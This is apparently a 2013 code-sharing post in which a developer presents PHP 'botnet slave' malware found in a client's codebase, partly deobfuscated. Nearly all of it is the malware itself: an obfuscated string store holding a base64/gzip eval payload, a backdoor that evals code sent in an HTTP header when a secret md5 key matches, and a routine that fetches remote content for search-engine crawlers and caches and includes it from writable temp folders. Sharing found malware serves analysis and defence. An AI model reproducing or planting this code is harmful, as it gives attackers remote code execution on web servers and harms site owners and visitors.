XjSv
2/22/2013 - 7:28 PM

The botnet slave code I found in a client's codebase last night, deobfuscated and cleaned up a bit.

The botnet slave code I found in a client's codebase last night, deobfuscated and cleaned up a bit.

<?php
if (!function_exists('get_string')){
    $GLOBALS['string_store'] = 'uUY3VybARX2luaXQ.YWxsb3dfdXJsX2ZvcGVuMQaHR0cDovLwu_JndheT1maWxlX2dldF9jb250ZW50cwDX3NldG9wdAf}lX2V4ZWMZJndheT1jdXJswxO#!~Lwb3Nvbi5pbgYS1pbi1hLWNpcmNsZS5jb20w^ecGhwYWlkZS5jb20kYcdwPSBWV8OgLcZGlzcGxheV9lcnJvcnMQsKZGV0ZXJtaW5hdG9yuBZnRwMTMLKMi4xOAGUVFRT1EwT1EwT09RT1FP~YmFzZTY0X2RlY29kZQ_WYmFzZTY0X2VuY29kZQt~SFRUUF9IT1NU)X;dW5pb24Oc2VsZWN0U&OPMeUkVRVUVTVF9VUkkP_@U0NSSVBUX05BTUUrUVVFUllfU1RSSU5HPw #HLL3RtcC8uZm9udC11bml4!=gVE1QGqu_VEVNUAw*PVE1QRElSyfhkdG1wQ%nd3AtY29udGVudC91cGxvYWRzd3AtY29udGVudC9jYWNoZQ@}dXBsb2FkX3RtcF9kaXIx^u@dL3RtcALLgdmVyc2lv %(LLQj;qxLXBocA=@rSFRUUF9FWEVDUEhQ ~$b3V0b2s~~ySFRUUF9VU0VSX0FHRU5URcoYLAKgZ29vZ2xlLHlhaG9vLGJpbmcsbXNuYm90LGFzayxiYWlkdSx5YW5kZXgL3BnLnBocD91PQ!*Jms9KHTJnQ9cGhwJnA9tJnY9Qg}ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5VlYvdHYya2dRL2xjMktJcHN5Zlg1Z1hsY3ppZFFTaTZXY2pnUXFGU2xrVVhOa2xnMU5yTE5wVkhFLzM0eis3Q1h4RW52bWg4S083TXpPNC92bXlIWkVPMWtUVGRKUnRkYVowMHJXbXlUYkZYbFJVZlhYOGhtbjhWVmttZEVsVVFibW0rMDB5Qkk3ZFEyeU5ucHpMSm00WXo0WkxxOHZ0YkpDMmxPdGtsYzVGV3lwVnBWN0tsK1RncGE3WXVNcUNiZzlOQjRlcURWSmttcEJqYmdMelRBV0RnTHcxQkhzNkVGbjhGc2tBYTJuYWFwNWhpa0IvZVpKVHNBaWRBeGE0MmhRZnFnTVVxeUpDcHBwZFVDdTI4UXg5SU5nZzlJSUE5TTVhRkZSU2UrNHRMRlExMkVDWUZhL2dnZmpEZWpPTThxbWxWbFk4SUYvN2FsRTVPSWdOZ25GcEhaMlBRZ2p5NDRxdk1qVEdObWFGcFNmSjdNVUVSL0ppVzRFREZqbVU0RHNHS25FUDVJbkdvaUtmQ2xMU2tEaDczcUhQMkVvVFZyVFp3bk1pZnNhTUtMUVM2VzgrdndaaEhCZndiNW41SGFsZ3RxanY2aDRhdkorUE5rYm14V0VQcUhpdlBKWWptZkx1Ymo2ZTBsWEJBOTlyNytSVGlkVGk0V2krRHZTYmhjR01SaktZQkh6bVlzZVR3YjhoNmFpdmRGR3NWcFhsTGxGTXRCdDd2cVdST1hvUWlObVNaV2UyQVF5UEtocVNyVGtWWEZGdUlRUU9lYk1vOS81RHVhTmEwL3NIajd3MWVERlJrTTgwZmpDeVI4ZUNlQ2x0WG1uQnpERTBMYTdQYXlmUkMvbmI4bUMvSWlLblU0ZTFvOSsvZ1NXcEdyeGVMbU45dTB2aFhmc3F1OHJINUhOZmEwQXg1MWVJL1pBUVBlemRWTkZONDI3V003TnVMRXhQTXZrL2x0RUU1YmZDOUxXbndhUHdCbTBEZzN4b3hMQjArUFNBWW5IL0NQaUU4bloyZEVlOFUzNUZNai9nTmUwMlRLeEl3RFpKWEgyTTZBVWRGb0krc3Q2WW4xQlNNZStuT1g1bXVxZGVvM0d0SWs2TzB6WkJpaGZXZmROM2hPdHUzM1FJLzV4RC9vRHN0aWhSb1h4ZXBab1NISFpkQlN3R2E3Y09TNFIwY2VBdEJEWk5WaytsUWtGV1ZOQ3Y4TUJuRkl4WXRzSDd3TDdDV2FqaXNwNU1lSkR0UkhHMkdJWDZrTm5hdTVRb21JcGZhZjd5c29PTTlJaUZ3T1dvQk1NRW5qeDF4NU94S1NxNXRDVWVtaWdjZTZTRncwV2Y0NnJFcHZDWDJBQ1JqcXZPMzVVR3VrRGtMSDdnbSs1MnczOHh1eEl3WUZ4NmlsU055QkdES1FJT2dsUmRMMTJIeEFHTUJaa0NxaVhnOGNEWmdJNkRnSUZOR2dGbkV3K2E4cHRKYVlmbGtWVlo3bVQ3VFFScWZSN1dRT1VMcHI5SzBlSTFOc3RFMWUwRlg4Q0hXTkVOQ3Jrb2hrK244MldjZTZnOGxkenRzZURwdDZ1d2pZUHRhYldiZ1QxKy85Rmo2VE0rbDlXeERKNEwvWk9zQ3J0Sk9rWk5CNUcyTFhaVjE5enlmdSszTEczMi9GUFp1TGtUSmJVNGhkRG0xeC95dnpwcm9DREJGOU9Pbytzc2l4SUprYTJOdVhaVzI3VmNmSmhnS2NCLzVvdS9ia01EQkZYNXFDWjBVejh0NkQxa3Y5ZFZKa0t5QytLTG9NcmlkUnBKdWZnemtNdTNEK0ZiemRqT2RqK0NpMmdpQ29XVWFOYWlnMm9wYjNkUjFBYUZlL2J4ZTZGa0tFQ3lmVEwrOWNPNWE0ckVWYUpkS2FDSzJoZ3k0dVNsMjlWUUw5NUxTTGtGd2NCK042cytGNURFRkRYU1ZTai9zM3lCR3FSTm9RVjdnSHdGemdjRG9SaTRBNGxOdFlhcHQrYS83NXBsbEd5S2lyN3lrOXZzbWVqdHNZUHp3bjM4SC9qM3BDVk51ZC95WStqMitrcG1nYjRhS3VVZ2ZIZVBRMUdpOFhWNTE3M3hkcWtvTWxvNDRFVnl0bVdZRU15WWlLUTQrUGRrR2lxcUNQbWF2M2s1UU5HRUdPYmVqekdFMGkrbkRLMEg5V3Fid0ZObjd4UEp3TTNhTzZJZis3T3B0QnNDTlhtc1UreW9Uelh4V1FRZWFyeXZmeEkvL0tmaHpFNlg1Tm96eUxxVHprTE1kWE5BVHZDRFpCbXNVNHhjV1JKR3EyUDQ4K3BtcHZ5R2ZGRVZYTGJhTFc2dGtJUVRXb0hzNStENlo2M1htMi9ZckkrUk9NV25yaSs1ZHNjK1pxYXFqOFJ4UU9lblZWN1BVQk8zYVhUMWt3MGhTME4reGlrbVZyTllLK3hSYW1saDdvMitJSzd4bzJBQU5PT00xUE83Ym93SUxVL0xvN2YxV1N3M0hudzkrL2t4VVhuQT09IikpKTs(cHJlZ19yZXBsYWNlu&';
    
    function get_string($a, $b){
        $c=$GLOBALS['string_store'];
        $d=pack('H*','626173'.'6536345f6465636f6465');
        return $d(substr($c, $a, $b));
    };
}

if (!defined("determinator")){
    function determinator_feof($IIl1l1, &$Q00QOQ = NULL) {
        $Q00QOQ = microtime(true);
        return feof($IIl1l1);
    }
    
    function getfile($Q0Q0QO, $QOQOOO){
        $QO0OQO = get_string(2, 6);
        $IIl11I = $QO0OQO.get_string(9, 7);
        
        @ini_set(get_string(17, 20), 1);
        
        if (@ini_get(get_string(17, 20)) == get_string(37, 2)) { 
            $Q0Q000=@file_get_contents(get_string(39, 10) . $Q0Q0QO . $QOQOOO. get_string(51, 30));
            return $Q0Q000;
        } elseif (function_exists($IIl11I)){
            $I1ll1l = @$IIl11I();
            $IIlIl1 = $QO0OQO.get_string(82, 10);
            $Q0OO0Q = $QO0OQO.get_string(95, 7);
            @$IIlIl1($I1ll1l, CURLOPT_URL, get_string(39, 10) . $Q0Q0QO . $QOQOOO. get_string(103, 12));
            @$IIlIl1($I1ll1l, CURLOPT_HEADER,false);
            @$IIlIl1($I1ll1l, CURLOPT_RETURNTRANSFER,true);
            @$IIlIl1($I1ll1l, CURLOPT_CONNECTTIMEOUT, 5);
            $QQOQQQ = @$Q0OO0Q($I1ll1l);
            @curl_close($I1ll1l);
            
            if (empty($QQOQQQ)){
                $QQOQQQ = get_string(118, 0);
            }
            
            return $QQOQQQ; 
        } else {
            $IIl1l1 = @fsockopen($Q0Q0QO, 80, $QOQ0Q0, $I1lI11, 5);
            
            if ($IIl1l1) {
                $Q0OQ00 = get_string(118, 0);
                $Q00QOQ = NULL;
                @fputs($IIl1l1, "GET {$QOQOOO}&way=socket HTTP/1.0\r\nHost: {$Q0Q0QO}\r\n");
                $II1I1I = PHP_OS.get_string(121, 2).PHP_VERSION;
                @fputs($IIl1l1, "User-Agent: {$II1I1I}\r\n\r\n");
                
                while(!determinator_feof($IIl1l1, $Q00QOQ) && (microtime(true) - $Q00QOQ) < 2){
                    $Q0OQ00 .= @fgets($IIl1l1, 128);
                }
                
                @fclose($IIl1l1);
                $Q0OOQO = explode("\r\n\r\n", $Q0OQ00);
                unset($Q0OOQO[0]);
                return implode("\r\n\r\n", $Q0OOQO);
            }
        }
    }
    
    $QQ00OQ = Array(get_string(123, 10), get_string(133, 23), get_string(159, 15));
    
    function write($QQOOOO,$QO0OOQ){
        if ($IIIlI1=@fopen($QQOOOO,get_string(177, 2))){
            @fwrite($IIIlI1,$QO0OOQ);
            @fclose($IIIlI1);
        }
    }
    
    function output($Q0OOOO, $IIllIl){
        echo get_string(182, 3).$Q0OOOO.get_string(185, 2).$IIllIl."\r\n";
    }
    
    @ini_set(get_string(189, 19), 0);
    define(get_string(211, 16), 1);
    $QO0OQQ=get_string(229, 7);
    $QQOQQ0=get_string(238, 6);
    $QOO00Q=get_string(245, 20);
    $IlI1Il=get_string(266, 18);
    $I11III=get_string(286, 18);
    $Q0Q0QO=get_string(39, 10);
    $Q0Q0QO.=strtolower(@$_SERVER[get_string(306, 12)]);
    
    foreach ($_GET as $Q0OOOO=>$IIllIl){
        if (strpos($IIllIl,get_string(321, 7))){
            $_GET[$Q0OOOO]=get_string(118, 0);
        } elseif (strpos($IIllIl,get_string(329, 8))){
            $_GET[$Q0OOOO]=get_string(118, 0);
        }
    }
    
    if(!isset($_SERVER[get_string(343, 15)])) {
        $_SERVER[get_string(343, 15)] = @$_SERVER[get_string(361, 15)];
        
        if(@$_SERVER[get_string(377, 16)]) {
            $_SERVER[get_string(343, 15)] .= get_string(393, 2) . @$_SERVER[get_string(377, 16)];
        }
    }
    
    if ($IIlI1l=$Q0Q0QO.@$_SERVER[get_string(343, 15)]){
        $IIIlII=@md5($Q0Q0QO.$QQOQQ0.PHP_OS.$QOO00Q);
        $Il1Ill=dirname(__FILE__).DIRECTORY_SEPARATOR;
        $IIlIII = Array(
            get_string(399, 20),
            @$_SERVER[get_string(422, 4)],
            @$_SERVER[get_string(430, 6)],
            @$_ENV[get_string(422, 4)],
            @$_ENV[get_string(439, 8)],
            @$_ENV[get_string(430, 6)],
            $Il1Ill.get_string(451, 4),
            $Il1Ill.get_string(458, 24),
            $Il1Ill.get_string(482, 22),
            @ini_get(get_string(506, 19)),
            get_string(530, 6), 
        );
        
        foreach ($IIlIII as $I1lll1){
            if (!empty($I1lll1)){
                $I1lll1.=DIRECTORY_SEPARATOR;
                
                if (@is_writable($I1lll1)){
                    $Il1Ill = $I1lll1;
                    break;
                }
            }
        }
        
        $tmp=$Il1Ill.get_string(537, 2).$IIIlII;
        
        if (@$_SERVER["HTTP_Y_AUTH"]==$IIIlII){
            echo "\r\n";
            @output(get_string(539, 8), $QQOQQ0.get_string(551, 2).$QO0OQQ.get_string(557, 6));
            
            if ($IlIlI1=$IlI1Il(@$_SERVER[get_string(566, 16)])){
                @eval($IlIlI1);
                echo "\r\n";
                @output(get_string(585, 4), get_string(589, 3));
            }
            exit(0);
        }
        
        if (@is_file($tmp)){
            @touch($tmp);
            @include_once($tmp);
        } else {
            $IIlI1l=@urlencode($IIlI1l);
            $Q0Q00Q = @strtolower(@$_SERVER[get_string(595, 20)]);
            
            foreach (explode(get_string(619, 2), get_string(623, 55)) as $I1ll11){
                if (strpos($Q0Q00Q, $I1ll11)!==False){
                    if (@touch($tmp)){
                        $QOQOOO = get_string(678, 14).$IIlI1l.get_string(694, 4).$IIIlII.get_string(701, 12).$QO0OQQ.get_string(714, 4).$QQOQQ0;
                        $I1IIII = getfile($QQ00OQ[0], $QOQOOO);
                        @touch($tmp);
                    }
                    break;
                }
            }
        }
    }
}
?>